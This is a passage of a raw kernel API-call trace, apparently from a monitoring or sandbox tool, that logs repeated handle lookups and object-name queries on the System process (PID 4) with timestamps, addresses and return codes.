Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.997] PsAcquireProcessExitSynchronization () returned 0x0 [0258.997] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.997] ObReferenceObjectByHandle (in: Handle=0xffffffff80001260, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.997] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.997] PsReleaseProcessExitSynchronization () returned 0x2 [0258.997] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f944 [0258.997] IoCompleteRequest () returned 0x0 [0258.997] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.997] PsAcquireProcessExitSynchronization () returned 0x0 [0258.997] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.997] ObReferenceObjectByHandle (in: Handle=0xffffffff80001268, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a679e50, HandleInformation=0x0) returned 0x0 [0258.997] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.997] PsReleaseProcessExitSynchronization () returned 0x2 [0258.997] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f943 [0258.997] ObQueryNameString (in: Object=0xffffe0006a679e50, ObjectNameInfo=0xffffe000684197c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe000684197c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.997] ObfDereferenceObject (Object=0xffffe0006a679e50) returned 0x8000 [0258.997] IoCompleteRequest () returned 0x0 [0258.997] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.997] PsAcquireProcessExitSynchronization () returned 0x0 [0258.998] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.998] ObReferenceObjectByHandle (in: Handle=0xffffffff80001294, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a33c280, HandleInformation=0x0) returned 0x0 [0258.998] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.998] PsReleaseProcessExitSynchronization () returned 0x2 [0258.998] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f942 [0258.998] ObQueryNameString (in: Object=0xffffe0006a33c280, ObjectNameInfo=0xffffe0006a3b4344, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3b4344, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.998] ObfDereferenceObject (Object=0xffffe0006a33c280) returned 0x8000 [0258.998] IoCompleteRequest () returned 0x0 [0258.998] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.998] PsAcquireProcessExitSynchronization () returned 0x0 [0258.998] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.998] ObReferenceObjectByHandle (in: Handle=0xffffffff800012a4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.998] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.998] PsReleaseProcessExitSynchronization () returned 0x2 [0258.998] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f941 [0258.998] IoCompleteRequest () returned 0x0 [0258.998] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.998] PsAcquireProcessExitSynchronization () returned 0x0 [0258.998] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.998] ObReferenceObjectByHandle (in: Handle=0xffffffff800012a8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.998] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.998] PsReleaseProcessExitSynchronization () returned 0x2 [0258.998] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f940 [0258.998] IoCompleteRequest () returned 0x0 [0258.998] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.998] PsAcquireProcessExitSynchronization () returned 0x0 [0258.998] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.998] ObReferenceObjectByHandle (in: Handle=0xffffffff800012ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00069860460, HandleInformation=0x0) returned 0x0 [0258.998] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.998] PsReleaseProcessExitSynchronization () returned 0x2 [0258.998] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f93f [0258.998] ObQueryNameString (in: Object=0xffffe00069860460, ObjectNameInfo=0xffffe0006a0d57c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a0d57c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0258.998] ObfDereferenceObject (Object=0xffffe00069860460) returned 0x8000 [0258.998] IoCompleteRequest () returned 0x0 [0258.998] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.998] PsAcquireProcessExitSynchronization () returned 0x0 [0258.998] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.998] ObReferenceObjectByHandle (in: Handle=0xffffffff800012b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.998] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.998] PsReleaseProcessExitSynchronization () returned 0x2 [0258.998] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f93e [0258.998] IoCompleteRequest () returned 0x0 [0258.998] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.998] PsAcquireProcessExitSynchronization () returned 0x0 [0258.998] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.999] ObReferenceObjectByHandle (in: Handle=0xffffffff800012c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.999] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.999] PsReleaseProcessExitSynchronization () returned 0x2 [0258.999] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f93d [0258.999] IoCompleteRequest () returned 0x0 [0258.999] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.999] PsAcquireProcessExitSynchronization () returned 0x0 [0258.999] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.999] ObReferenceObjectByHandle (in: Handle=0xffffffff800012cc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.999] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.999] PsReleaseProcessExitSynchronization () returned 0x2 [0258.999] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f93c [0258.999] IoCompleteRequest () returned 0x0 [0258.999] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.999] PsAcquireProcessExitSynchronization () returned 0x0 [0258.999] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.999] ObReferenceObjectByHandle (in: Handle=0xffffffff800012dc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.999] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.999] PsReleaseProcessExitSynchronization () returned 0x2 [0258.999] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f93b [0258.999] IoCompleteRequest () returned 0x0 [0258.999] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.999] PsAcquireProcessExitSynchronization () returned 0x0 [0258.999] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.999] ObReferenceObjectByHandle (in: Handle=0xffffffff800012e4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.999] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.999] PsReleaseProcessExitSynchronization () returned 0x2 [0258.999] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f93a [0258.999] IoCompleteRequest () returned 0x0 [0258.999] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.999] PsAcquireProcessExitSynchronization () returned 0x0 [0258.999] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.999] ObReferenceObjectByHandle (in: Handle=0xffffffff800012e8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.999] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.999] PsReleaseProcessExitSynchronization () returned 0x2 [0258.999] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f939 [0258.999] IoCompleteRequest () returned 0x0 [0258.999] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0258.999] PsAcquireProcessExitSynchronization () returned 0x0 [0258.999] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0258.999] ObReferenceObjectByHandle (in: Handle=0xffffffff800012ec, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0258.999] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0258.999] PsReleaseProcessExitSynchronization () returned 0x2 [0258.999] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f938 [0258.999] IoCompleteRequest () returned 0x0 [0259.000] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.000] PsAcquireProcessExitSynchronization () returned 0x0 [0259.000] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.000] ObReferenceObjectByHandle (in: Handle=0xffffffff800012f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.000] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.000] PsReleaseProcessExitSynchronization () returned 0x2 [0259.000] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f937 [0259.000] IoCompleteRequest () returned 0x0 [0259.000] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.000] PsAcquireProcessExitSynchronization () returned 0x0 [0259.000] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.000] ObReferenceObjectByHandle (in: Handle=0xffffffff800012f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a6a0070, HandleInformation=0x0) returned 0x0 [0259.000] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.000] PsReleaseProcessExitSynchronization () returned 0x2 [0259.000] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f936 [0259.000] ObQueryNameString (in: Object=0xffffe0006a6a0070, ObjectNameInfo=0xffffe0006a2cb4c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a2cb4c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.000] ObfDereferenceObject (Object=0xffffe0006a6a0070) returned 0x8000 [0259.000] IoCompleteRequest () returned 0x0 [0259.000] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.000] PsAcquireProcessExitSynchronization () returned 0x0 [0259.000] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.000] ObReferenceObjectByHandle (in: Handle=0xffffffff80001304, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.000] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.000] PsReleaseProcessExitSynchronization () returned 0x2 [0259.000] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f935 [0259.000] IoCompleteRequest () returned 0x0 [0259.000] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.000] PsAcquireProcessExitSynchronization () returned 0x0 [0259.000] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.000] ObReferenceObjectByHandle (in: Handle=0xffffffff80001308, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.000] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.000] PsReleaseProcessExitSynchronization () returned 0x2 [0259.000] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f934 [0259.000] IoCompleteRequest () returned 0x0 [0259.000] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.000] PsAcquireProcessExitSynchronization () returned 0x0 [0259.000] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.000] ObReferenceObjectByHandle (in: Handle=0xffffffff8000131c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a4c33a0, HandleInformation=0x0) returned 0x0 [0259.000] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.000] PsReleaseProcessExitSynchronization () returned 0x2 [0259.000] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f933 [0259.000] ObQueryNameString (in: Object=0xffffe0006a4c33a0, ObjectNameInfo=0xffffe0006914d044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006914d044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.000] ObfDereferenceObject (Object=0xffffe0006a4c33a0) returned 0x8000 [0259.000] IoCompleteRequest () returned 0x0 [0259.000] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.001] PsAcquireProcessExitSynchronization () returned 0x0 [0259.001] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.001] ObReferenceObjectByHandle (in: Handle=0xffffffff80001320, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe000691ea8c0, HandleInformation=0x0) returned 0x0 [0259.001] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.001] PsReleaseProcessExitSynchronization () returned 0x2 [0259.001] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f932 [0259.001] ObQueryNameString (in: Object=0xffffe000691ea8c0, ObjectNameInfo=0xffffe0006a40c7c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a40c7c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.001] ObfDereferenceObject (Object=0xffffe000691ea8c0) returned 0x8000 [0259.001] IoCompleteRequest () returned 0x0 [0259.001] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.001] PsAcquireProcessExitSynchronization () returned 0x0 [0259.001] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.001] ObReferenceObjectByHandle (in: Handle=0xffffffff80001324, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.001] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.001] PsReleaseProcessExitSynchronization () returned 0x2 [0259.001] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f931 [0259.001] IoCompleteRequest () returned 0x0 [0259.001] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.001] PsAcquireProcessExitSynchronization () returned 0x0 [0259.001] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.001] ObReferenceObjectByHandle (in: Handle=0xffffffff80001328, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00068483840, HandleInformation=0x0) returned 0x0 [0259.001] ObfDereferenceObject (Object=0xffffe00068483840) returned 0x20008 [0259.001] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.001] PsReleaseProcessExitSynchronization () returned 0x2 [0259.001] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f930 [0259.001] IoCompleteRequest () returned 0x0 [0259.001] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.001] PsAcquireProcessExitSynchronization () returned 0x0 [0259.001] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.001] ObReferenceObjectByHandle (in: Handle=0xffffffff80001338, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.001] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.001] PsReleaseProcessExitSynchronization () returned 0x2 [0259.001] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f92f [0259.001] IoCompleteRequest () returned 0x0 [0259.001] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.001] PsAcquireProcessExitSynchronization () returned 0x0 [0259.001] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.001] ObReferenceObjectByHandle (in: Handle=0xffffffff80001340, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.001] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.001] PsReleaseProcessExitSynchronization () returned 0x2 [0259.001] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f92e [0259.001] IoCompleteRequest () returned 0x0 [0259.001] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.001] PsAcquireProcessExitSynchronization () returned 0x0 [0259.001] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.001] ObReferenceObjectByHandle (in: Handle=0xffffffff80001350, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0x0, HandleInformation=0x0) returned 0xc0000008 [0259.001] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.002] PsReleaseProcessExitSynchronization () returned 0x2 [0259.002] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f92d [0259.002] IoCompleteRequest () returned 0x0 [0259.002] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.002] PsAcquireProcessExitSynchronization () returned 0x0 [0259.002] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.002] ObReferenceObjectByHandle (in: Handle=0xffffffff80001354, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a53a3e0, HandleInformation=0x0) returned 0x0 [0259.002] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.002] PsReleaseProcessExitSynchronization () returned 0x2 [0259.002] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f92c [0259.002] ObQueryNameString (in: Object=0xffffe0006a53a3e0, ObjectNameInfo=0xffffe0006a334044, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a334044, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.002] ObfDereferenceObject (Object=0xffffe0006a53a3e0) returned 0x8000 [0259.002] IoCompleteRequest () returned 0x0 [0259.002] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.002] PsAcquireProcessExitSynchronization () returned 0x0 [0259.002] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.002] ObReferenceObjectByHandle (in: Handle=0xffffffff80001358, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a44c610, HandleInformation=0x0) returned 0x0 [0259.002] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.002] PsReleaseProcessExitSynchronization () returned 0x2 [0259.002] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f92b [0259.002] ObQueryNameString (in: Object=0xffffe0006a44c610, ObjectNameInfo=0xffffe0006a3ae6c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3ae6c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.002] ObfDereferenceObject (Object=0xffffe0006a44c610) returned 0x8000 [0259.002] IoCompleteRequest () returned 0x0 [0259.002] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.002] PsAcquireProcessExitSynchronization () returned 0x0 [0259.002] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.002] ObReferenceObjectByHandle (in: Handle=0xffffffff80001360, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe00068409e50, HandleInformation=0x0) returned 0x0 [0259.002] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.002] PsReleaseProcessExitSynchronization () returned 0x2 [0259.002] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f92a [0259.002] ObQueryNameString (in: Object=0xffffe00068409e50, ObjectNameInfo=0xffffe0006a3307c4, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a3307c4, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.002] ObfDereferenceObject (Object=0xffffe00068409e50) returned 0x8000 [0259.002] IoCompleteRequest () returned 0x0 [0259.002] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.002] PsAcquireProcessExitSynchronization () returned 0x0 [0259.002] KeStackAttachProcess (in: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400 | out: PROCESS=0xffffe00067e72040, ApcState=0xffffd000b1b8e400) [0259.002] ObReferenceObjectByHandle (in: Handle=0xffffffff80001368, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x0, Object=0xffffd000b1b8e378, HandleInformation=0x0 | out: Object=0xffffd000b1b8e378*=0xffffe0006a747480, HandleInformation=0x0) returned 0x0 [0259.002] KeUnstackDetachProcess (ApcState=0xffffd000b1b8e400) [0259.002] PsReleaseProcessExitSynchronization () returned 0x2 [0259.002] ObfDereferenceObject (Object=0xffffe00067e72040) returned 0x2f929 [0259.002] ObQueryNameString (in: Object=0xffffe0006a747480, ObjectNameInfo=0xffffe0006a331244, Length=0x800, ReturnLength=0xffffd000b1b8e380 | out: ObjectNameInfo=0xffffe0006a331244, ReturnLength=0xffffd000b1b8e380) returned 0x0 [0259.002] ObfDereferenceObject (Object=0xffffe0006a747480) returned 0x8000 [0259.002] IoCompleteRequest () returned 0x0 [0259.002] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xffffd000b1b8e388 | out: Process=0xffffd000b1b8e388) returned 0x0 [0259.002] PsAcquireProcessExitSynchronization () returned 0x0 [0259.002] KeStackAttachProcess (in: 